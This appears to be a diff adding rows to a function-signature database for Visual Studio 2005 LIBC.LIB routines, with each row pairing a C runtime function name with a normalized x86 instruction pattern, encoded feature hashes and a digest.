+__mkgmtime,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,cug6RSSjmVys2tP2h0dSPz167csAAAAAPXrty3LoOkVy6DpFmi80Iibu4WWDMP3Scug6RSSjmVychlE4nIZROPC4n1KxZJG+iM1H1SSjmVytkX8CgzD90oejbX0AAAAAsWSRviSjmVwuVbn+LlW5/hzsTtghh3ljcug6RZyGUThy6DpFcug6RZyGUThy6DpFJu7hZYejbX0AAAAArZF/AiSjmVwuVbn+h6NtfSSjmVyXIor4cug6RZtDmsWHo219h6NtfSSjmVxeo4MnlyKK+HLoOkVy6DpFLlW5/uHP4Uy7tlwsXqODJ5tDmsUAAAAAcug6RZtDmsWHo219h6NtfSSjmVyaLzQiIYd5Y6Wbj2echlE4h6NtfSSjmVybQ5rFnIZROKWbj2cc7E7Yh6NtfSSjmVxeo4Mn4c/hTE79CxR9g+K+HOxO2KWbj2cAAAAATv0LFCSjmVytkX8Ccug6RZovNCKHo219XqODJ5ovNCIAAAAAcug6RZovNCKHo219h6NtfSSjmVyaLzQigzD90oejbX0AAAAAu7ZcLCI7jNbhz+FMmi80Iibu4WWDMP3S8LifUiSjmVylm49nfYPivk79CxQAAAAAgzD90nLoOkUAAAAAJu7hZYejbX0AAAAAh6NtfSSjmVyXIor4pZuPZzlafGAAAAAAlyKK+HLoOkVy6DpFrZF/AiSjmVwiO4zWJu7hZXLoOkUAAAAAJKOZXDlafGAAAAAAcug6RZovNCKHo219OVp8YAAAAAAAAAAArNrT9nLoOkVy6DpFIjuM1j167cu7tlwsh6NtfSSjmVxeo4Mnm0OaxSbu4WWDMP3Su7ZcLD167cuHR1I/XqODJ5yGUTgAAAAAXqODJ5ovNCIAAAAAcug6RZovNCKHo219cug6RSSjmVxeo4Mn,33c360a1ebb6d528c704be4831c786401962dc0f,VS2005,LIBC.LIB
+_mktime,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,nIZROPC4n1KxZJG+iM1H1SSjmVytkX8CgzD90oejbX0AAAAAsWSRviSjmVwuVbn+u7ZcLCI7jNbhz+FMJu7hZYejbX0AAAAArZF/AiSjmVwuVbn+h6NtfSSjmVyXIor4cug6RZtDmsWHo219h6NtfSSjmVxeo4MnlyKK+HLoOkVy6DpFcug6RZyGUThy6DpFLlW5/uHP4Uy7tlwsXqODJ5tDmsUAAAAAcug6RZtDmsWHo219u7ZcLD167cuHR1I/IYd5Y6Wbj2echlE4h6NtfSSjmVybQ5rFnIZROKWbj2cc7E7Yh6NtfSSjmVxeo4Mn4c/hTE79CxR9g+K+HOxO2KWbj2cAAAAAm0OaxSbu4WWDMP3SXqODJ5ovNCIAAAAAcug6RZovNCKHo219h6NtfSSjmVyaLzQih6NtfSSjmVyaLzQigzD90oejbX0AAAAAcug6RSSjmVys2tP2mi80Iibu4WWDMP3S8LifUiSjmVylm49nfYPivk79CxQAAAAAgzD90nLoOkUAAAAAJu7hZYejbX0AAAAAh6NtfSSjmVyXIor4LlW5/hzsTtghh3ljpZuPZzlafGAAAAAAlyKK+HLoOkVy6DpFrZF/AiSjmVwiO4zWcug6RZyGUThy6DpFJu7hZXLoOkUAAAAAJKOZXDlafGAAAAAATv0LFCSjmVytkX8Ccug6RZovNCKHo219OVp8YAAAAAAAAAAArNrT9nLoOkVy6DpFIjuM1j167cu7tlwsh6NtfSSjmVxeo4MnXqODJ5ovNCIAAAAAcug6RZovNCKHo219cug6RSSjmVxeo4MnXqODJ5yGUTgAAAAAh0dSPz167csAAAAAPXrty3LoOkVy6DpFmi80Iibu4WWDMP3Scug6RZovNCKHo219cug6RSSjmVychlE4,32ea596e760bd0877de32af3ee3c0d5bf72bee02,VS2005,LIBC.LIB
+__mbspbrk,"MOV R8,BYTE PTR DS:[R32]\nPOP R32\nNEG R8\nSBB R32,R32\nPOP R32\nAND R32,R32\nPOP R32\nRETN",5esbaCdGqp6vIf/0GFgyxgAAAAAAAAAAryH/9J2OqXAnRqqe9pNHmBhYMsb1iDxH5esbaAnzT2qt4xSlJ0aqnhhYMsblsZZOCMlR//aTR5iFPI1GreMUpSdGqp4J809q5bGWTq8h//SvIf/09Yg8RydGqp6djqlw2KWjaidGqp6djqlwhTyNRgAAAAAAAAAAryH/9BhYMsavIf/0CfNPaidGqp4NzMABnY6pcOXrG2jl6xtoDczAAa8h//QAAAAAryH/9Nilo2oYWDLG,[],a84a0f76deddf2fb219b0095ef698d3d886a1b9e,VS2005,LIBC.LIB
+_wcschr,"MOV R16,WORD PTR DS:[R32]\nSUB R16,WORD PTR SS:[ESP+CONST]\nNEG R16\nSBB R32,R32\nNOT R32\nAND R32,R32\nRETN",Gy5bfxCU6Q7P62Icz+tiHBCU6Q6doIgzEJTpDgAAAAAAAAAAhQQLwhsuW38AAAAAnaCIMxsuW38AAAAA,[],3c9f0b058e84a13049fecaf21b9c0633df07ed91,VS2005,LIBC.LIB
+??2@YAPAXI@Z,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,XgpICwAAAAAAAAAA,WrCX6Fqwl+gm7uFlzSwRpibu4WVasJfoWrCX6AGhdbPf6hBMJu7hZQGhdbMAAAAAAaF1swAAAAAAAAAA3+oQTAGhdbNasJfo,32ea596e760bd0877de32af3ee3c0d5bf72bee02,VS2005,LIBC.LIB
+_longjmp,"LEA R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST\nOR R32,R32\nJCC CONST",u7ZcLOmQYbyMl096TXXeoumQYbwAAAAAuqBeBLu2XCwFKPtFjJdPeosVZXS06ChhixVldOmQYbwAAAAAtOgoYYsVZXQuVbn+6ZBhvAAAAAAAAAAABSj7Rbu2XCwAAAAALlW5/umQYbxNdd6i,[],2969e689d3dbc4a8ffb82049b66d328ec8bd4baa,VS2005,LIBC.LIB
+__wstati64,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nADD ESP,CONST\nCMP R32,R32",8qD+KtC4S02cN7CknDewpA49NxQtjqF80MTIbeiZVToFa6+36JlVOibu4WUAAAAALY6hfA49NxTzjRv0pK1g+mHqQPMbLlt/nDewpA49NxQtjqF8yPvC5kL41tYAAAAAGy5bfwkKJmYqOdrWLY6hfA49NxQzjAqGBWuvt4k5mYeIXCPr840b9EL41tYAAAAAKjna1gkKJmbI+8LmDj03FCbu4WUAAAAAiFwj6+iZVTqJOZmHLY6hfA49NxTVdbCAM4wKhpw3sKTyoP4qiTmZh+iZVToVQb8RCQomZg52sqsAAAAAJu7hZUL41tYAAAAAQvjW1gAAAAAAAAAAFUG/EZGiMxMAAAAA1XWwgJw3sKTyoP4qJrKnd0L41tYAAAAAYepA85w3sKQkP6zuDnayq5w3sKQkP6zukaIzE0L41tYAAAAA0LhLTZw3sKTyoP4q8qD+Kpw3sKSgNzqhoDc6oSayp3cAAAAAJD+s7uiZVTrQxMhtIcjSeMj7wuakrWD6nDewpA49NxQtjqF8,[],21aedac0ebcfc58770a286b13fdf1f902f81e418,VS2005,LIBC.LIB
+__wasctime,"MOVSX BP,BYTE PTR DS:[R32+R32]\nMOV WORD PTR DS:[R32],BP\nMOVSX BP,BYTE PTR DS:[R32+R32]\nMOV WORD PTR DS:[R32+CONST],BP\nINC R32\nINC R32\nINC R32\nCMP CONST2,CONST",PKhWOgAAAAAAAAAALCheaUquFRUAAAAASq4VFUquFRU8qFY6,[],2adf74758d8cbaec2c57308bcb170046f8115e40,VS2005,LIBC.LIB
+_memchr,"PUSH R32\nMOV R32,R32\nSHL R32,CONST\nADD R32,R32\nMOV R32,R32\nSHL R32,CONST\nADD R32,R32\nJMP SHORT CONST",l9p7lADh1mtY2ig6WNooOlylOYm7tlwsu7ZcLLu2XCyweoZ5sHqGeRqNz30AAAAAz3PioQDh1mtcpTmJu7ZcLADh1mtcpTmJXKU5iWe6vA2X2nuUl9p7lFylOYkA4dZrAOHWawAAAAAAAAAAu7ZcLM9z4qEajc99Go3Pfbu2XCyEcIcdAcDPEADh1mu7FOf8hHCHHQF5m4HYzQSm2M0EpgF5m4HLaBJKy2gSSgF5m4HYzQSm2M0EprE/Nsxeo4MnuxTn/Lu2XCxcpTmJXqODJ7u2XCwAAAAAsT82zGe6vA0AAAAAZ7q8DQAAAAAAAAAAAXmbgQAAAAAAAAAAAXmbgQAAAAAAAAAAXKU5iWe6vA2X2nuUAXmbgQAAAAAAAAAA,[],04a810e63716214489b1d389146793effc562880,VS2005,LIBC.LIB
+__ismbslead,"MOV R32,R32\nINC R32\nCMP R32,DWORD PTR SS:[ESP+CONST]\nJCC CONST",KeroSOj+gdBO8N70Us42lQAAAAAAAAAAJAPDnVLONpUHLsvXTvDe9JuQUPwUxIhqm5BQ/AAAAAAAAAAABy7L11LONpWP4s79nIZROFLONpWP4s79FMSIalLONpXo/oHQj+LO/VLONpUp6uhI6P6B0JyGUTgAAAAA,[],f89786e8aed411076a7d35fc7ca1088fbb8aa8c8,VS2005,LIBC.LIB
+__makepath,"PUSH R32\nPUSH R32\nCALL CONST\nMOV R8,BYTE PTR DS:[R32]\nPOP R32\nCMP R8,CONST\nPOP R32\nJCC CONST",0sOBFouKeXrYzQSm2M0EpouKeXpCd8pQQnfKUC5Vuf5WPGr1i4p5ei5Vuf5WPGr1Vjxq9djNBKYAAAAA2M0Epi5Vuf6NzlApjc5QKdjNBKYAAAAALlW5/vf9O+aP4s79j+LO/Xxq1Nlb0BXgW9AV4Hxq1NmyBKM2sgSjNnxq1NkAAAAAfGrU2T/DesVeo4Mns1Af9rT2lJaP4s79XqODJ3xq1NkAAAAAj+LO/bT2lJZvUr1dP8N6xQAAAAAAAAAAb1K9XYuKeXoAAAAAtPaUlouKeXqP4s79i4p5eouKeXqP4s799/075gAAAAAAAAAAj+LO/YuKeXrDlaNnw5WjZ8OVo2fSw4EW,[],f41524d8a11ac6846e933267c2547d0493f0a522,VS2005,LIBC.LIB
+__spawnlpe,"PUSH DWORD PTR DS:[R32]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP EBP",eei+egAAAAAAAAAAAoVQxXnovnp748YLe+PGC3vjxgt56L56,[],171d62738e5e0ba6a732fa0c2d5ef2e0b94bae4f,VS2005,LIBC.LIB
+___loctotime_t,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nTEST R32,R32\nJCC CONST",FEmCbrlbSYechlE4UsQx5hehh26tkX8Cyej+OA3MwAG5W0mHeEnEjBRJgm67tlwsTqCLsQAAAAAAAAAAnIZROA3MwAEkA8OduVtJh06gi7EAAAAAu7ZcLBRJgm44YJDLJAPDnQ3MwAHJ6P44DczAAU6gi7EAAAAArZF/Ahehh254ScSMF6GHbgAAAAAAAAAAOGCQy7lbSYechlE4,[],912411a9d55991387d655cf027ead0173dc23797,VS2005,LIBC.LIB
+___crtGetStringTypeW,"LEA ESP,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32\nLEAVE\nRETN",ldYH9k5qw84AAAAADczAAb+iYE8AAAAAqX+m3Sbu4WXtia+3FjgIIibu4WUuVbn+LlW5/pLtqo0uJm6oLiZuqCbu4WXP62Ic7Ymvt079CxQY23jKku2qjSbu4WXP62Icv6JgT079CxQY23jKu7ZcLE79CxQY23jKGNt4yuKh3IcAAAAATmrDzibu4WWIc9+f0S3Jeru2XCx/rESsiHPfnybu4WXfJ6dqJu7hZeKh3IcAAAAATv0LFCbu4WW7IZT2uyGU9meLxSaxe28Bz+tiHCbu4WXd5tqOsXtvASbu4WWV1gf23ebajuKh3IcAAAAAZ4vFJibu4WWV1gf23yenahY4CCIAAAAAf6xErKl/pt0NzMAB4qHchwAAAAAAAAAA,[],ab0cfd624ff2e9a24ae2eceecf76c6c2158d5a42,VS2005,LIBC.LIB
+__frnd,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nFRNDINT\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]",Uj1P3QAAAAAAAAAA,[],88ae3a47e58dc9dab441472af2098ce9011e7a84,VS2005,LIBC.LIB
+_wWinMainCRTStartup,"PUSH CONST\nCALL CONST\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCALL CONST\nCALL CONST\nMOV DWORD PTR DS:[0],R32\nCALL CONST",XWelNT8Z6cI14zRoNeM0aGo60bWWfJuvPxnpwmo60bWWfJuvlnybr5Tvkz0AAAAAajrRtQAAAAAAAAAAlO+TPQAAAAAAAAAA,[],6a88dfb75f30c9ac4f70d376827bf9d999a8b774,VS2005,LIBC.LIB
+__swab,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nSHR R32,CONST\nPUSH R32\nMOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]",B0nUdgdJ1HZZ3Yd2Wd2HdgGhdbMAAAAAVNdf/AdJ1HYAAAAA32ZuSwGhdbNU11/8AaF1swAAAAAAAAAA,[],6295c1c3f09baa348e652b5a7e13ee1e82ed9de0,VS2005,LIBC.LIB
+__heap_abort,PUSH CONST\nCALL CONST\nPOP R32\nRETN,ojBH2AAAAAAAAAAA,7g2DFgAAAAAAAAAAJAPDne4NgxapmnivqZp4rwAAAAAAAAAA,270697db551414b0577b89e87f1b8654f0659ea6,VS2005,LIBC.LIB
+__y1,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nSAHF\nJCC CONST",9ira3QAAAAAAAAAAckHtIAAAAAAAAAAAiz8Fg3JB7SD2Ktrd7YCXrgAAAAAAAAAAa8jct4s/BYPtgJeu,[],3f73398bbe47871c96bebe0df8d8f2e8e360470d,VS2005,LIBC.LIB
+__y0,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nSAHF\nJCC CONST",iz8Fg3JB7SD9jYfR7YCXrgAAAAAAAAAAckHtIAAAAAAAAAAAa8jct4s/BYPtgJeu/Y2H0QAAAAAAAAAA,[],ef5f86e1b79bf75faa0c6c6ad2b71ba8bbf89f53,VS2005,LIBC.LIB
+__jn,"FLD QWORD PTR SS:[EBP+CONST]\nFMUL QWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR DS:[R32+CONST]\nFSTP QWORD PTR SS:[EBP+CONST]\nFLDZ\nCMP R32,R32",Xm5bjjqgBE0AAAAAwW3FYSGHeWPSJpVt44EePN3jKcMzjyq20iaVbT6Rh3cFMGScHC2dvMICJIJebluOC3R9ZU6gi7EAAAAAlxhlTB9Qkb8rY9X0A7mm9gO5pvYcLZ28M48qtjOPKrbd4ynDuJuPMxwtnbwDuab2BTBknAt0fWUAAAAAPpGHd5cYZUxBkjQ3OqAETcICJIJebluOK2PV9E6gi7EAAAAAIYd5Yz6Rh3cFMGScQZI0Nwt0fWUAAAAAwgIkgk6gi7EAAAAATqCLsQAAAAAAAAAAH1CRv7ibjzPjgR483eMpw06gi7EAAAAA,[],65be44ce24065b5d464c35b410c8efc9a9ca6860,VS2005,LIBC.LIB
+__j0,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nSAHF\nJCC CONST",OluqqwAAAAAAAAAAiz8Fg3JB7SA6W6qrckHtIAAAAAAAAAAAlnblP3JB7SA6W6qra8jct4s/BYOWduU/,[],75c3fb81b737513d7885e9826290cc45a9f8ed08,VS2005,LIBC.LIB
+__j1,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],CONST\nFSTSW R16\nSAHF",qCaCIpOqGwIXRV6gk6obAgAAAAAAAAAAF0VeoAAAAAAAAAAAiz8Fg5OqGwIXRV6gHkeMUYs/BYOoJoIi,[],de81621f41103dc8e9d038f34975b7833c4aefd3,VS2005,LIBC.LIB
+__yn,FILD DWORD PTR SS:[EBP+CONST]\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]\nFMUL QWORD PTR SS:[EBP+CONST]\nPOP R32\nPOP R32\nLEAVE\nRETN,4rk10yGHeWMwlhcGZQCYNy6JAm4AAAAA53dLt+K5NdO1zuPXFjgIIieG6nTSNDwmMJYXBnLoOkUWOAgibLSTIQAAAAAAAAAAlyJFRmy0kyFPTjVrJ4bqdJciRUZlAJg3cug6RSeG6nTSNDwmLokCbgAAAAAAAAAAIYd5YyeG6nTSNDwm0jQ8Ji6JAm4AAAAAtc7j1y6JAm4AAAAAT041a09ONWtstJMh,[],9c3831ddff6a8f3e5d5c3b2905c4120a816a88d9,VS2005,LIBC.LIB
+_strlen,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,CONST\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nADD R32,CONST\nTEST R32,CONST\nJCC CONST",hHCHHTRC1hXYzQSmXqODJzUpQDIAAAAAkgi/tzUpQDKEcIcdNELWFQAAAAAAAAAA2M0EpjRC1hXoVavaPAoaXTUpQDJcpTmJ6FWr2jRC1hXoVavaNELWFQAAAAAAAAAANELWFQAAAAAAAAAAWNooOlylOYmSCL+36FWr2jRC1hVeo4MnXKU5iTRC1hVY2ig6NELWFQAAAAAAAAAANSlAMjUpQDKEcIcd,[],aabfaee53403212a64dc133b061579a28e28cffe,VS2005,LIBC.LIB
+___crtGetLocaleInfoA,"LEA ESP,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32\nLEAVE\nRETN",KF2/q/97P48AAAAA/3s/jxY4CCIAAAAAW0iaF64DzS/WfO4M1nzuDP2OL2gAAAAArgPNLybu4WXtia+3FjgIIibu4WXQuj0d0Lo9HSbu4WVT3XTR7Ymvt079CxQY23jK/Y4vaE79CxQY23jKu7ZcLE79CxQY23jKGNt4yuKh3IcAAAAAU9100UmpAM51O0xhdTtMYXXRqYwAAAAASakAzuKh3IcAAAAAddGpjOKh3IcAAAAATv0LFCbu4WW7IZT20S3Jeru2XCxbSJoXuyGU9uAMOXAGr+YWBq/mFibu4WUoXb+rJu7hZeKh3IcAAAAA4qHchwAAAAAAAAAA4Aw5cCbu4WUoXb+r,[],c243005126de1a58a6bb669641f126fd367d9ff0,VS2005,LIBC.LIB
+___crtwsetenv,"PUSH CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,R32\nPOP R32\nCMP R32,R32\nPOP R32\nJCC CONST",cug6RR/LC39Abafgcug6Raz8UlkY8LpbGPC6W98TwOUAAAAAcug6RYejbX1SaOpbUmjqWx/LC39us2reAZqLR2Z5MTUAAAAA86mTz98TwOUAAAAAbrNq3gAAAAAAAAAAQvjW1gAAAAAAAAAAh6NtfWZ5MTVy6DpFCElxqZyGUTheo4Mncug6RWkRUS1pEVEtaRFRLW6zat6Elh6aQG2n4IejbX1y6DpFTFWqf26zat6nCLI6gZ2xVh/LC39AbafgrPxSWZyGUTgAAAAAaRFRLW6zat5TTYHzhJYemh/LC39pEVEtcug6RWZ5MTVy6DpFZnkxNUL41tYAAAAAcug6RajR9JGnNPGjpwiyOm6zat67IZT2pzTxo26zat6gaq4rqNH0kW6zat6gaq4rXqODJ6wDVxAAAAAAuyGU9m6zat59CWX8U02B8x/LC38AAAAAH8sLf3LoOkXfE8DlfQll/HLoOkWBnbFWoGquK5yGUTgAAAAArANXEJyGUTgAAAAAnIZROGZ5MTVV/5Wn3xPA5QhJcanzqZPPVf+Vp2Z5MTUBmotH3xPA5XLoOkVy6DpF,[],d4b31870662e8960e4d4f428dfaaa6c69b28046b,VS2005,LIBC.LIB
+__ioterm,"PUSH R32\nCALL CONST\nAND DWORD PTR DS:[R32],0\nPOP R32\nADD R32,CONST\nCMP R32,CONST\nJCC CONST",AOHWawAAAAAAAAAAfxd5TMZr930A4dZrS38+1sZr930A4dZrxmv3fUt/PtZ/F3lMn2tSM0t/PtZ/F3lM,[],9110e66e9ac0f2ccf106a952e686b97bee322775,VS2005,LIBC.LIB
+__ioinit,"PUSH CONST\nCALL CONST\nPOP R32\nMOV DWORD PTR DS:[0],R32\nMOV DWORD PTR DS:[0],CONST\nLEA R32,DWORD PTR DS:[R32+CONST]\nCMP R32,R32\nJCC CONST",7UbRFDmS93/jc18acV/aVFgrj1ZAZ//uXqODJ+RSvJ8AAAAAaRfnETmS938PNZEU5FK8nzmS938PNZEUQGf/7lgrj1avw3AryB/Yu2kX5xH1U6+zDzWRFOSrVGJt8KfG43NfGjmS93//EOEar8NwK7u2XCxYK49WbfCnxuSrVGJb0BXg/xDhGhWiMVaDGLeMW9AV4G8N4EVAZ//uWCuPVs7oVc8AAAAAQGf/7uSrVGJvDeBFsr5rkUimyeRlejTZu7ZcLM7oVc9YK49WWCuPVs7oVc8AAAAAgxi3jORSvJ9AFmPpbw3gRQ81kRQ5kvd/FaIxVuRSvJ9AFmPp9MwtJ5zGbOiKZImWzuhVz5zGbOiKZImWQBZj6WkX5xH1U6+zimSJlgAAAAAAAAAAZXo02e1G0RRaRdpySKbJ5O1G0RRaRdpy9VOvs3LoOkUAAAAA5KtUYg81kRQ5kvd/OZL3f/TMLSextfPInMZs6PTMLSextfPIcug6RQYHJ7qJB2HTcug6Re1G0RRaRdpyiQdh03LoOkUAAAAAWkXacnLoOkUAAAAAsbXzyIX6tZoNDA4gDQwOIHFf2lQAAAAAhfq1mlgrj1ZAZ//uBgcnusgf2Lteo4Mn,[],7e7c99e724326718c9a7db423bbe32efbfddd469,VS2005,LIBC.LIB
+___wsetargv,"PUSH CONST\nCALL CONST\nPOP R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",0n55hzplNTyKzu3tOmU1PAAAAAAAAAAAyTc9VyL7k49rtWLqRhyw/zplNTyKzu3ta7Vi6kYcsP/SfnmHIvuTj0YcsP/SfnmHis7t7QAAAAAAAAAA,[],2d715371d5abcf34ae94891dbaf7116171806db6,VS2005,LIBC.LIB
+__wfindnexti64,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR DS:[0]\nTEST R32,R32",Mg7y5wAAAAAAAAAAWz9DPoPygRm7tlwsmiFd3DIO8udbP0M+KcAj0AAAAAAAAAAAGaZm/ynAI9AAAAAAu7ZcLGqGyxK7tlwsu7ZcLBmmZv+7tlwsaobLEinAI9AAAAAAu7ZcLGqGyxKD8oEZg/KBGSnAI9AAAAAA,[],bb3fe054e5851de2c53f0e355dc51a156bb032b7,VS2005,LIBC.LIB
+__wfindfirsti64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nSUB R32,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]",u7ZcLGqGyxKD8oEZaobLEq8nV1wAAAAAg/KBGa8nV1wAAAAAtmUaEPRamgRbP0M+Wz9DPoPygRm7tlws9FqaBE6gi7EAAAAArydXXE6gi7EAAAAATqCLsQAAAAAAAAAAu7ZcLGqGyxK7tlwsGaZm/68nV1wAAAAAu7ZcLBmmZv+7tlws,[],f01245ae4613528599377d8c0164f2d6688b78bd,VS2005,LIBC.LIB
+__wcenvarg,"LEA R32,DWORD PTR DS:[R32+R32]\nPUSH R32\nCALL CONST\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nTEST R32,R32\nMOV DWORD PTR DS:[R32],R32\nJCC CONST",bx6qQEupfWAocCJ26KRdaEL41tYAAAAAxmv3fUupfWAocCJ2KHAidsZr930AAAAAEI1MMrAR+aDf3TmfrydXXEL41tYAAAAAxmv3fXLoOkWie94POcE+aDi4MwphH9si3905n7AR+aDf3TmfTajCyznBPmj2FXkHonveD8Zr930AAAAA3905n7AR+aAukZIzFvKnCznBPmj2FXkHLpGSM7AR+aDzzGWCHzvx0kTJQwuyhYa/88xlgt/dOZ+wEfmgxmv3fTi4MwphH9si9hV5B8Zr930AAAAAYR/bIvYVeQcAAAAAS6l9YIiLH/bZVIgrJVDFLph2eOoYNMfLcug6RUTJQwuyhYa/soWGv3LoOkUAAAAAGDTHy0L41tYAAAAA2VSIK68nV1yIix/2mHZ46kL41tYAAAAAsBH5oBbypwuEGBBi0pk610L41tYAAAAACFRG7Yz41XgQjUwyRMlDCy5Vuf6XP0guiIsf9hCNTDLgTEP0OLgzCnLoOkU6tqtbQvjW1gAAAAAAAAAA4ExD9BCNTDIIVEbtlz9ILuikXWgAAAAAjPjVeBCNTDIIVEbtOrarW3LoOkWie94PhBgQYkL41tYAAAAALlW5/k2owstvHqpAcug6RdKZOtclUMUu,[],88f60061f081fcbb5fd6a078c9882b27f390e9f0,VS2005,LIBC.LIB
+__wspawnve,"MOV R32,R32\nOR DWORD PTR SS:[EBP+CONST],CONST\nPUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32",cug6RUFF0BsignJUQRv/gHHbI37EkqZoIoJyVEL41tYAAAAAQRv/gMSSpmjx1sdAQUXQG0L41tYAAAAAQvjW1gAAAAAAAAAAxJKmaEL41tYAAAAAcdsjftHDam1Lfz7W8dbHQPQ42DYAAAAAsRHxBNHDam1Lfz7Wcug6Rfvd3QRy6DpFcug6RfQ42Db73d0E+93dBEEb/4BNBNpWKfdkI0FF0BsignJU9DjYNkEb/4BNBNpWHV2wR3LoOkVy6DpFS38+1rER8QReo4MnTQTaVnLoOkWuDsvaXqODJyn3ZCMAAAAA0cNqbUFF0BsignJUrg7L2nLoOkUAAAAAcug6RfQ42DYSoox5EqKMefQ42DZBG/+A,[],290ad4fedd2095bfd4376a95e949d4936b61d38a,VS2005,LIBC.LIB
+__locking,"XOR R32,R32\nPUSH CONST\nPUSH R32\nPUSH R32\nCALL CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nOR R32,CONST\nADD ESP,CONST",FsaC00L41tachlE4cug6RQ3MwAGchlE4nIZRONu5JnechlE4nIZRONu5Jnc9ZCFoPWQhaCSjmVwAAAAAnIZROAAfpvggiQ4Z27kmdySjmVwAAAAAIIkOGRCLnLEAH6b4AB+m+JwJz6XRH3LmDczAAUL41tYAAAAAhnY75ySjmVwAAAAAauZfv5wJz6XRH3LmJKOZXEL41tYAAAAA0R9y5nLoOkUAAAAAC9VTB4Z2O+fJhTYaEIucsZwJz6XRH3LmnAnPpbshlPYkx8cpyYU2GoZ2O+cWxoLTQvjW1gAAAAAAAAAAcug6RbshlPYkx8cpJMfHKXLoOkVy6DpFuyGU9nLoOkVy6DpFcug6RQ3MwAGZcfTimXH04mrmX78AAAAA,[],51a90f0e4183cc484037f6bdd09a614a254a4b88,VS2005,LIBC.LIB
+__wcsnicmp,"PUSH EBP\nMOV EBP,ESP\nXOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",jPjVeComZx5Z3Yd2zmbPiO68llsm7uFlWd2HdhMxc/cAAAAAEzFz9wAAAAAAAAAAjPjVeBMxc/eM+NV4KiZnHlndh3aM+NV4rrNiqRB27oK/0WmdJu7hZe68llsAAAAA7ryWW0NFkXnqMoS4jPjVeO68llteo4MnAOHWawAAAAAAAAAAXqODJxMxc/cAAAAAv9Fpne68llsAAAAAEHbugiomZx4AAAAAJKOZXENFkXkAAAAA6jKEuENFkXkko5lc7ryWWybu4WXOZs+IjPjVeFndh3aM+NV4LTlqTQDh1muus2KpQ0WReRMxc/eM+NV4,[],b40cbc54d439950f0a7061730298007b7cf406e0,VS2005,LIBC.LIB
+__purecall,PUSH CONST\nCALL CONST\nPOP R32\nRETN,ojBH2AAAAAAAAAAA,7g2DFgAAAAAAAAAAJAPDne4NgxapmnivqZp4rwAAAAAAAAAA,863b7346611a3e65a688e1110f6ead91630ea774,VS2005,LIBC.LIB
+__outp,"XOR R32,R32\nMOV R16,WORD PTR SS:[ESP+CONST]\nMOV R8,BYTE PTR SS:[ESP+CONST]\nOUT R16,R8\nRETN",/mnCuQAAAAAAAAAA,[],31adbd9aa638c5dbae4188e8654d7a84365aac28,VS2005,LIBC.LIB
+__outpd,"MOV R16,WORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nOUT R16,R32\nRETN",N5DATgAAAAAAAAAA,[],e8913b445122fa827694a3cd3fa7a809e8cbea63,VS2005,LIBC.LIB
+__outpw,"MOV R16,WORD PTR SS:[ESP+CONST]\nMOV R16,WORD PTR SS:[ESP+CONST]\nOUT R16,R16\nRETN",eQ+DlwAAAAAAAAAA,[],48c420c1b99793294d47213d64d636b2904f59c8,VS2005,LIBC.LIB
